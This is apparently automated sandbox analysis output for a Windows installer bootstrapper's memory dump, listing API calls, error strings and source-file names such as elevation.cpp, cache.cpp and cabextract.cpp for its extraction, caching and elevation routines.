                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431D07: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00413C09,0000001C,00000000,00000000,?,?,0040A090), ref: 00431D27
                                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,0000014C,00000000,0000014C,000000B8,000000B8,0040B23D,?,0000014C,0000001C,0040B23D,000000B8,00000000,00000000,0040B23D), ref: 0040A323
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to find local %hs appdata directory., xrefs: 0040A2C6
                                                                                                                                                                  • per-user, xrefs: 0040A2BB
                                                                                                                                                                  • Failed to create regid folder: %ls, xrefs: 0040A361
                                                                                                                                                                  • Failed to write tag xml to file: %ls, xrefs: 0040A357
                                                                                                                                                                  • Failed to allocate regid folder path., xrefs: 0040A371
                                                                                                                                                                  • per-machine, xrefs: 0040A2B6, 0040A2C5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FolderPathlstrlen
                                                                                                                                                                  • String ID: Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to find local %hs appdata directory.$Failed to write tag xml to file: %ls$per-machine$per-user
                                                                                                                                                                  • API String ID: 3664928333-722958590
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateThread.KERNEL32 ref: 0041639F
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00401E79,?,?,?), ref: 004163AB
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,0041596E,?,00000000,?,?,?,00401E79,?,?,?), ref: 0041642A
                                                                                                                                                                  Strings
                                                                                                                                                                  • elevation.cpp, xrefs: 004163CF
                                                                                                                                                                  • Failed to pump messages in child process., xrefs: 00416401
                                                                                                                                                                  • Failed to create elevated cache thread., xrefs: 004163D9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastThread
                                                                                                                                                                  • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                                                                                                                                  • API String ID: 747004058-4134175193
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0041AC76
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to format property value., xrefs: 0041ACEA
                                                                                                                                                                  • %s%="%s", xrefs: 0041AC9C
                                                                                                                                                                  • Failed to append property string part., xrefs: 0041ACD5
                                                                                                                                                                  • Failed to escape string., xrefs: 0041ACE3
                                                                                                                                                                  • Failed to format property string part., xrefs: 0041ACDC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                  • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                                                                                                                                  • API String ID: 3613110473-515423128
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0000046C,00000001,00401414,0000046C,00000001,000000FF,0000046C,00000470,74EDA770,000000B8,00000001,00000000,?,00411524), ref: 004165CC
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to elevate., xrefs: 004165A2
                                                                                                                                                                  • Failed to create pipe and cache pipe., xrefs: 0041654E
                                                                                                                                                                  • elevation.cpp, xrefs: 004164FF
                                                                                                                                                                  • Failed to create pipe name and client token., xrefs: 00416535
                                                                                                                                                                  • UX aborted elevation requirement., xrefs: 00416509
                                                                                                                                                                  • Failed to connect to elevated child process., xrefs: 004165B5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                                                                                                                  • API String ID: 2962429428-3003415917
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000000,?,004369E7,00000003,00000001,00000001,000007D0,00000003,00000000,?,00413927,000000F9), ref: 004368C5
                                                                                                                                                                  • GetLastError.KERNEL32(000000FA,?,004369E7,00000003,00000001,00000001,000007D0,00000003,00000000,?,00413927,000000F9,000007D0,00000001,00000001,00000003), ref: 004368D4
                                                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,004369E7,00000003,00000001,00000001,000007D0,00000003,00000000,?,00413927,000000F9), ref: 00436963
                                                                                                                                                                  • GetLastError.KERNEL32(?,004369E7,00000003,00000001,00000001,000007D0,00000003,00000000,?,00413927,000000F9,000007D0), ref: 0043696D
                                                                                                                                                                    • Part of subcall function 00436AF7: FindFirstFileW.KERNEL32(00000000,?,0000001C,00000000,00000000), ref: 00436B32
                                                                                                                                                                    • Part of subcall function 00436AF7: FindClose.KERNEL32(00000000), ref: 00436B3E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                  • String ID: \$fileutil.cpp
                                                                                                                                                                  • API String ID: 3479031965-1689471480
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00424B12
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 00424B40
                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00424B49
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                  • String ID: Failed to allocate buffer.$NetFxChainer.cpp$kNB
                                                                                                                                                                  • API String ID: 4225769859-3387352115
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00412609
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00412613
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 0041267E
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate administrator SID., xrefs: 004125FA
                                                                                                                                                                  • cache.cpp, xrefs: 00412637
                                                                                                                                                                  • Failed to initialize ACL., xrefs: 00412641
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileInitializeLast
                                                                                                                                                                  • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                                                                                                                  • API String ID: 669721577-1117388985
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,OZB,?,00000033,?), ref: 004387B1
                                                                                                                                                                  • GetLastError.KERNEL32(?,00425A4F,?,00000033,?,?,00000013,?,?,?,0042570D,?,?,?,?,?), ref: 004387BB
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,?,?,00000000,00000000), ref: 004387EE
                                                                                                                                                                  • GetLastError.KERNEL32(?,00425A4F,?,00000033,?,?,00000013,?,?,?,0042570D,?,?,?,?,?), ref: 004387F8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHttpInfoLastQuery
                                                                                                                                                                  • String ID: OZB$inetutil.cpp
                                                                                                                                                                  • API String ID: 4218848986-2711219560
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0042368C
                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0042369E
                                                                                                                                                                  • SetFileTime.KERNEL32(?,?,?,?), ref: 004236B1
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004236BF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Invalid operation for this state., xrefs: 00423665
                                                                                                                                                                  • cabextract.cpp, xrefs: 0042365B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                  • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                  • API String ID: 609741386-1751360545
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405B5D
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002A8,?,00000000,00000000,000000F8,000000F8,00000000,00000000,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 00405B72
                                                                                                                                                                  • GetLastError.KERNEL32(?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 00405B7D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variable., xrefs: 00405BDE
                                                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00405BB6
                                                                                                                                                                  • Failed to format variable string., xrefs: 00405B68
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                  • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                  • API String ID: 1811509786-402580132
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • cabextract.cpp, xrefs: 004235FC
                                                                                                                                                                  • Unexpected call to CabWrite()., xrefs: 00423592
                                                                                                                                                                  • Failed to write during cabinet extraction., xrefs: 00423606
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                  • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                                  • API String ID: 1970631241-3111339858
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00401C5F,00000008,00000000,00401C5F,77A19EB0,?,00401C5F), ref: 00431E2D
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401C5F), ref: 00431E37
                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000000,00000014(TokenIntegrityLevel),00401C5F,00000004,?,?,00401C5F), ref: 00431E69
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00401C5F), ref: 00431EC0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$CloseErrorHandleInformationLastOpenProcess
                                                                                                                                                                  • String ID: procutil.cpp
                                                                                                                                                                  • API String ID: 3370771294-1178289305
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,00000000,00000000), ref: 00412047
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000), ref: 00412051
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to append bundle id on to temp path for working folder., xrefs: 004120A2
                                                                                                                                                                  • Failed to get temp path for working folder., xrefs: 0041207F
                                                                                                                                                                  • cache.cpp, xrefs: 00412075
                                                                                                                                                                  • %ls%ls\, xrefs: 0041208E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastPathTemp
                                                                                                                                                                  • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to get temp path for working folder.$cache.cpp
                                                                                                                                                                  • API String ID: 1238063741-3390808230
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,kNB,00424C15,00000000,?,00000000,?,?,?,?,00424E6B,?), ref: 0042499F
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,00424E6B,?), ref: 00424A23
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • _memmove.LIBCMT ref: 00424A0A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocMutexObjectProcessReleaseSingleWait_memmove
                                                                                                                                                                  • String ID: Failed to allocate memory for message data$NetFxChainer.cpp$kNB
                                                                                                                                                                  • API String ID: 1414281441-4192571162
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00429471: __getptd_noexit.LIBCMT ref: 00429472
                                                                                                                                                                  • __lock.LIBCMT ref: 0042C82E
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0042C84B
                                                                                                                                                                  • _free.LIBCMT ref: 0042C85E
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(00456950), ref: 0042C876
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                                  • String ID: PiE$PiE
                                                                                                                                                                  • API String ID: 2704283638-4029992010
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _malloc.LIBCMT ref: 00428F7F
                                                                                                                                                                    • Part of subcall function 0042BBE1: __FF_MSGBANNER.LIBCMT ref: 0042BBF8
                                                                                                                                                                    • Part of subcall function 0042BBE1: __NMSG_WRITE.LIBCMT ref: 0042BBFF
                                                                                                                                                                    • Part of subcall function 0042BBE1: HeapAlloc.KERNEL32(?,00000000,00000001,?,00000000,00000000,?,0042C16B,00000000,00000000,00000000,00000000,?,0042C05B,00000018,00454160), ref: 0042BC24
                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 00428F9B
                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00428FB0
                                                                                                                                                                    • Part of subcall function 0042BDAE: RaiseException.KERNEL32(?,?,004013A3,<@E,?,?,?,00428FB5,004013A3,0045403C,?,00000001), ref: 0042BDFF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                                                                  • String ID: PD$PD$XD
                                                                                                                                                                  • API String ID: 1059622496-1744646304
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __lock.LIBCMT ref: 0042953C
                                                                                                                                                                    • Part of subcall function 0042BF92: __mtinitlocknum.LIBCMT ref: 0042BFA4
                                                                                                                                                                    • Part of subcall function 0042BF92: EnterCriticalSection.KERNEL32(00000000,?,00429541,0000000D,004540B8,00000008,004294D3,00000000,00000000,004079F6,?,00000000,00000000), ref: 0042BFBD
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00429549
                                                                                                                                                                  • __lock.LIBCMT ref: 0042955D
                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 0042957B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                                  • String ID: PiE$pD
                                                                                                                                                                  • API String ID: 1687444384-1223142982
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00402807,00000000), ref: 0043206C
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00432073
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00402807,00000000), ref: 0043208A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                  • String ID: IsWow64Process$kernel32$procutil.cpp
                                                                                                                                                                  • API String ID: 4275029093-1586155540
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00435DD9
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(00457F3C), ref: 00435DF6
                                                                                                                                                                  • CLSIDFromProgID.OLE32(Msxml2.DOMDocument,00457F2C,?,?,?,?,00000000), ref: 00435E11
                                                                                                                                                                  • CLSIDFromProgID.OLE32(MSXML.DOMDocument,00457F2C,?,?,?,?,00000000), ref: 00435E1D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                                  • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                                  • API String ID: 2109125048-2356320334
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 004185A6
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 004186EA
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to recreate command-line for update bundle., xrefs: 00418664
                                                                                                                                                                  • update\%ls, xrefs: 00418604
                                                                                                                                                                  • Failed to default local update source, xrefs: 00418618
                                                                                                                                                                  • Failed to set update bundle., xrefs: 004186BB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                                                                                                                                  • API String ID: 3168844106-1266646976
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(00000000,00000002,000000B8,00000000,00000000), ref: 00432AFA
